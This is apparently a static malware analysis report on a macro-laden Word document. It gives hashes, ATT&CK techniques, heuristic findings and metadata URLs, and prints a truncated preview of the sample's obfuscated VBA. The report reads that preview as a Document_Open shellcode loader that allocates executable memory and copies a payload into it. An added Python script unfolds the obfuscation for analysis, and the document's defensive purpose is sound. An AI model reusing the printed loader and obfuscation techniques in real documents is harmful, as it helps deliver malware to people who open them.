Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 01748620a67cf331…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 191.0 KB
Created: 2018-05-14 15:22:00
Authoring application: Microsoft Office Word
First seen: 2019-04-18
MD5: 888fc820b3c5a29ca0c2641b1f69b618
SHA-1: fc98b3e3db78fb499d08e89773fc7e6fecd5c7b2
SHA-256: 01748620a67cf33122ed0a542eca38b36c9fbfb1876797b71b7f27393a207804
Risk score: 182

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1203 Exploitation for Client Execution

The sample is a Word document carrying VBA macros, including a Document_Open handler that runs as soon as the document is opened with macros enabled, together with a lure telling the user to enable macros, the standard social-engineering step for macro droppers. ClamAV names the file Doc.Downloader.Macro-6539595-0, a downloader signature. The extracted source does not bear that out on its own: the visible portion is heavily obfuscated and references no URL at all, and every URL extracted from the document is an XML namespace identifier (XMP, RDF, Dublin Core, DrawingML) or an Azure Information Protection service endpoint left behind by document metadata, not a payload location. What the visible macro does show is dead string assignments, junk calls to the financial function Pmt whose result is discarded, arithmetic padding that folds to small constants, #If conditional-compilation blocks keyed on Win64 that select LongPtr or Long versions of the same logic, a read of 8 bytes (4 on Win32, i.e. one pointer) from VarPtr(accounting) + 8, which is the data field of a VARIANT, and calls into routines (semidesert, tyrannic, refrigeratory) that are defined nowhere in the preview, which in VBA usually means Declare'd external APIs. After folding, tyrannic is called with (-1, 0, 0, 9435, 4096, 64) and the helper fulciment forwards (-1, destination, source, length, plus a by-reference fifth argument) to semidesert, first to copy the pointer out of the Variant and then to copy 5883 bytes from that pointer into the region tyrannic returned. -1 is the current-process pseudo-handle, 4096 is 0x1000 (MEM_COMMIT) and 64 is 0x40 (PAGE_EXECUTE_READWRITE), an argument pattern consistent with allocating executable memory in the current process and copying a payload into it, i.e. an in-process shellcode loader rather than a plain URL downloader. Whether that payload is embedded in the document or fetched over the network cannot be settled from the truncated preview; the Declare statements that would name the APIs, and any download code, fall outside the first 1,000 lines, so the downloader classification rests on the ClamAV signature rather than on the visible source.

Heuristics (6)

  • ClamAV: Doc.Downloader.Macro-6539595-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
  • VBA macros detected (medium, OLE_VBA_MACROS; 2 related findings)
    Document contains VBA macro code
  • Document_Open macro (high, OLE_VBA_DOCOPEN)
    The document carries a Document_Open handler, which Word runs automatically when the document is opened with macros enabled
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only documents and documents whose source extraction fails, where no readable macro source is available.
  • Macro/content-enable lure (medium, SE_ENABLE_LURE)
    The document instructs the user to enable macros or editing, a common technique used by malware droppers to get past Office macro security settings
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL label says which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
    • http://purl.org/dc/elements/1.1/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
    • http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
    • https://api.informationprotection.azure.com/api/31ae1cef-2393-4eb1-8962-4e4bbfccd663 (in document text, OLE body)
    All nine come from document metadata: eight are XML namespace identifiers (XMP, RDF, Dublin Core, DrawingML) and one is an Azure Information Protection service endpoint. None is a payload location, and none appears in the visible macro source.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 12920 bytes
SHA-256: e0c74302b9466d9af41aab0b6fdd7924196b3925be8fdfdb428a2d755b13289d

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function fulciment(goatish, aerosolized, know)
Dim aghast As Variant
Dim coffeepot As Variant
Dim mnemonic As LongPtr
Dim occupancy As LongPtr
Dim cannulation As LongPtr
Dim housing As String
Dim pitymys As LongPtr
Dim autotelic As LongPtr
biodegradable = dishearten
unfolding = Fix(383)
occupancy = goatish
autotelic = know
unfolding = laconically + 433
pitymys = aerosolized
broadband = 32 + 16
 Pmt 0, broadband, 34371, 10250, 4

dishearten = "millihenry"
mnemonic = 51 - 42 - 10
semidesert ByVal mnemonic, _
occupancy, _
pitymys, autotelic, _
cannulation
dishearten = "nonphilosophical"
End Function
Function boasting(accounting)
Dim distract As Long
Dim inexpectant As String
Dim expensiveness As Long
Dim fit As Variant
#If (3 - 96 + 493 + 36 - 47 + 311) > ((37 - 68 + 351) - (78 - 68 + 530) * 1) And ((97 - 26 - 43) - (104 - 26 - 50)) * 2 < (Win64) Then
Dim laws As String
Dim redetermination As LongPtr
abstinent = 43 - 23 - 12
Dim otariidae As LongPtr
Dim macleaya As Long
Dim thornless As String
Dim shillings As LongPtr
Dim moated As Byte
trickedout = VarPtr(redetermination)
fasciola = fulciment(trickedout, VarPtr(accounting) + (105 - 81 - 16), abstinent)
#ElseIf (2 - 51 + 449 + 96 - 64 + 268) > ((59 - 23 + 284) - (32 - 119 + 627) * 1) And Not ((114 - 72 - 14) - (95 - 11 - 56)) * 2 < (Win64) Then
Dim redetermination As Long
abstinent = 124 - 61 - 59
Dim otariidae As Long
Dim shillings As Long
trickedout = VarPtr(redetermination)
fasciola = refrigeratory(trickedout, VarPtr(accounting) + (19 - 55 + 44), abstinent)
#End If
heinous = 114 - 10 - 105
otariidae = 106 - 2 - 104
paraplegic = 124 - 93 - 31
shillings = 81 - 27 + 9381
ceremonies = 78 - 107 + 4125
elephas = 31 - 46 + 79
cousin = tyrannic(ByVal heinous, _
otariidae, ByVal paraplegic, shillings, ByVal ceremonies, _
ByVal elephas)
biodegradable = "cerrado"

sapphism = Math.Round(234)

#If (121 - 55 + 334 + 65 - 111 + 346) > ((28 - 23 + 315) - (86 - 111 + 565) * 1) And ((118 - 20 - 70) - (109 - 73 - 8)) * 2 < (Win64) Then
phyllidae = fulciment(otariidae, redetermination, 94 - 89 + 5878)
#ElseIf (70 - 96 + 426 + 85 - 108 + 323) > ((51 - 79 + 348) - (122 - 4 + 422) * 1) And Not ((13 - 18 + 33) - (115 - 53 - 34)) * 2 < (Win64) Then
filth = refrigeratory(otariidae, redetermination, 6 - 36 + 5913)
#End If
pros = 32 + 48
 Pmt 0, pros, 29463, 51451, 2

boasting = otariidae
End Function
Sub grocer()
Dim gaseousness As Integer
Dim instructed As String
simpson.jars.Value = Day(#12/5/2013#)
varday = ametabolic = "capsheaf"
athletic = dimidium
arteriosclerosis = "abate"
journalist = "memoria"
oxbow = "campephilus"

maneuverability = "preliminary"
aristocratically = punctiliousness
matchstick = "morisco"
Set blessedness = simpson.jars.SelectedItem
espy = 36 + 41
 Pmt 0, espy, 39016, 18001, 5

debugger = blessedness.Name
attraction = 57 - 80 + 7867
micrography = Right(debugger, attraction)
cahoot = capitalsprint.actualized(micrography)
dandelion = 14 + 17
 Pmt 0, dandelion, 26480, 18041, 7

equiangular = "despumate"
selfaddressed = "advisability"
#If (73 - 61 + 388 + 13 - 111 + 398) > ((22 - 85 + 383) - (106 - 29 + 463) * 1) And ((59 - 19 - 12) - (29 - 49 + 48)) * 2 < (Win64) Then
Dim concordant As Byte
Dim outandouter As LongPtr
Dim bookshelf As LongPtr
Dim pandanales As Long
#ElseIf (7 - 55 + 448 + 75 - 37 + 262) > ((35 - 111 + 396) - (119 - 35 + 456) * 1) And Not ((38 - 48 + 38) - (78 - 86 + 36)) * 2 < (Win64) Then
Dim appease As String
Dim bookshelf As Long
Dim rakishness As Byte
Dim outandouter As Long
#End If
wifely = 92 - 100 + 8
midgard = "magazine"
prosauropoda = 73 - 20 + 4043
feces = 38 + 32
 Pmt 0, feces, 22442, 19980, 3

catostomid = "dripping"
artistic = "syneresis"
alleviation = 
... (truncated)
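The obfuscation layers visible in the preview above (the #If blocks keyed on Win64, the arithmetic padding and the Pmt junk statements) can be unfolded mechanically. The script below is an added example written for this page; it is not part of the analysis platform, of oletools, or of the sample. It evaluates each #If/#ElseIf condition under Win64 = 1 or 0 through an AST whitelist so that only the branch a 64-bit or 32-bit Office would compile survives, folds the arithmetic padding to its value outside string literals, drops the Pmt statements, and appends a comment where a folded value coincides with a well-known Win32 constant. The KNOWN_CONSTANTS table and the annotations are the editor's assumptions: a matching value is a hint about which API hides behind an undefined name, not proof. The input is the boasting function copied from the preview, trimmed of some declarations.

```python
"""Peel the obfuscation visible in macros.bas: #If blocks keyed on Win64, arithmetic
padding that folds to constants, and junk Pmt statements.  Standard library only."""
import ast
import re

# Nodes a translated VBA constant expression may contain: no names, calls or attributes.
_ALLOWED = (ast.Expression, ast.BinOp, ast.UnaryOp, ast.BoolOp, ast.Compare, ast.Constant,
            ast.Add, ast.Sub, ast.Mult, ast.USub, ast.Not, ast.And, ast.Or,
            ast.Lt, ast.Gt, ast.LtE, ast.GtE, ast.Eq, ast.NotEq)
# Assumed lookup table of Win32 values.  A match is a hint for the analyst, not proof:
# the Declare statements that would name the APIs are outside the preview.
KNOWN_CONSTANTS = {-1: "current-process pseudo-handle (GetCurrentProcess)",
                   4096: "0x1000 = MEM_COMMIT", 64: "0x40 = PAGE_EXECUTE_READWRITE"}
_ARITH = re.compile(r"\d+(?:\s*[-+]\s*\d+)+")   # e.g. "51 - 42 - 10"


def safe_eval(expr):
    """Evaluate an arithmetic/boolean expression through an AST whitelist."""
    tree = ast.parse(expr, mode="eval")
    for node in ast.walk(tree):
        if not isinstance(node, _ALLOWED):
            raise ValueError(f"unsupported node {type(node).__name__} in {expr!r}")
    return eval(compile(tree, "<vba-const>", "eval"), {"__builtins__": {}}, {})


def vba_condition_to_python(cond, symbols):
    """Translate a #If/#ElseIf condition to Python and substitute compiler constants.
    Both languages bind Not/not looser than comparisons, so the meaning is preserved."""
    cond = re.sub(r"\s+Then\s*$", "", cond.strip(), flags=re.I)
    cond = re.sub(r"\b(And|Or|Not)\b", lambda m: m.group(1).lower(), cond, flags=re.I)
    cond = re.sub(r"(?<![<>!=])=(?!=)", "==", cond.replace("<>", "!="))
    for name, value in symbols.items():
        cond = re.sub(rf"\b{name}\b", str(int(value)), cond, flags=re.I)
    return cond


def resolve_conditional_compilation(lines, symbols):
    """Keep only the lines the VBA compiler keeps for the given constants (nesting OK)."""
    out, stack = [], []   # stack entries: [parent_active, branch_taken, emitting]
    for line in lines:
        text = line.strip()
        low = text.lower()
        if low.startswith("#if "):
            parent = stack[-1][2] if stack else True
            live = parent and bool(safe_eval(vba_condition_to_python(text[4:], symbols)))
            stack.append([parent, live, live])
        elif low.startswith("#elseif "):
            parent, taken, _ = stack[-1]
            live = parent and not taken and bool(
                safe_eval(vba_condition_to_python(text[8:], symbols)))
            stack[-1] = [parent, taken or live, live]
        elif low.startswith("#else"):
            parent, taken, _ = stack[-1]
            stack[-1] = [parent, True, parent and not taken]
        elif low.startswith("#end if"):
            stack.pop()
        elif not stack or stack[-1][2]:
            out.append(line)
    return out


def fold_constants(line):
    """Replace arithmetic padding with its value, leaving string literals alone."""
    parts = line.split('"')            # even indexes are code, odd ones are literals
    for i in range(0, len(parts), 2):
        parts[i] = _ARITH.sub(lambda m: str(safe_eval(m.group(0))), parts[i])
    return '"'.join(parts)


def annotate(line):
    """Append a VBA comment when a folded assignment equals a known Win32 constant."""
    m = re.fullmatch(r"\s*\w+\s*=\s*(-?\d+)\s*", line)
    if m and int(m.group(1)) in KNOWN_CONSTANTS:
        return f"{line.rstrip()} ' {KNOWN_CONSTANTS[int(m.group(1))]}"
    return line


def deobfuscate(source, win64=True):
    """Pipeline: select the compiled branch, drop blank/junk lines, fold, annotate."""
    lines = resolve_conditional_compilation(source.splitlines(), {"Win64": win64})
    keep = [ln for ln in lines if ln.strip() and not re.match(r"\s*Pmt\s", ln)]
    return "\n".join(annotate(fold_constants(ln)) for ln in keep)


# Constructed input: the `boasting` function from the preview above, trimmed.
SAMPLE = """Function boasting(accounting)
#If (3 - 96 + 493 + 36 - 47 + 311) > ((37 - 68 + 351) - (78 - 68 + 530) * 1) And ((97 - 26 - 43) - (104 - 26 - 50)) * 2 < (Win64) Then
abstinent = 43 - 23 - 12
fasciola = fulciment(trickedout, VarPtr(accounting) + (105 - 81 - 16), abstinent)
#ElseIf (2 - 51 + 449 + 96 - 64 + 268) > ((59 - 23 + 284) - (32 - 119 + 627) * 1) And Not ((114 - 72 - 14) - (95 - 11 - 56)) * 2 < (Win64) Then
abstinent = 124 - 61 - 59
fasciola = refrigeratory(trickedout, VarPtr(accounting) + (19 - 55 + 44), abstinent)
#End If
heinous = 114 - 10 - 105
otariidae = 106 - 2 - 104
paraplegic = 124 - 93 - 31
shillings = 81 - 27 + 9381
ceremonies = 78 - 107 + 4125
elephas = 31 - 46 + 79
cousin = tyrannic(ByVal heinous, _
otariidae, ByVal paraplegic, shillings, ByVal ceremonies, ByVal elephas)
 Pmt 0, pros, 29463, 51451, 2
boasting = otariidae
End Function"""

if __name__ == "__main__":
    print(deobfuscate(SAMPLE, win64=True))
```

Running it with win64=True leaves the LongPtr branch with abstinent = 8 (the pointer-sized copy), folds the tyrannic arguments to -1, 0, 0, 9435, 4096 and 64, and annotates the three values that match the constant table; with win64=False the Long branch with refrigeratory and abstinent = 4 survives instead. The whitelist in safe_eval is what makes it acceptable to hand attacker-controlled text to eval: no Name, Call or Attribute node can reach it, so a condition such as the ones in this sample can only compute integers and booleans.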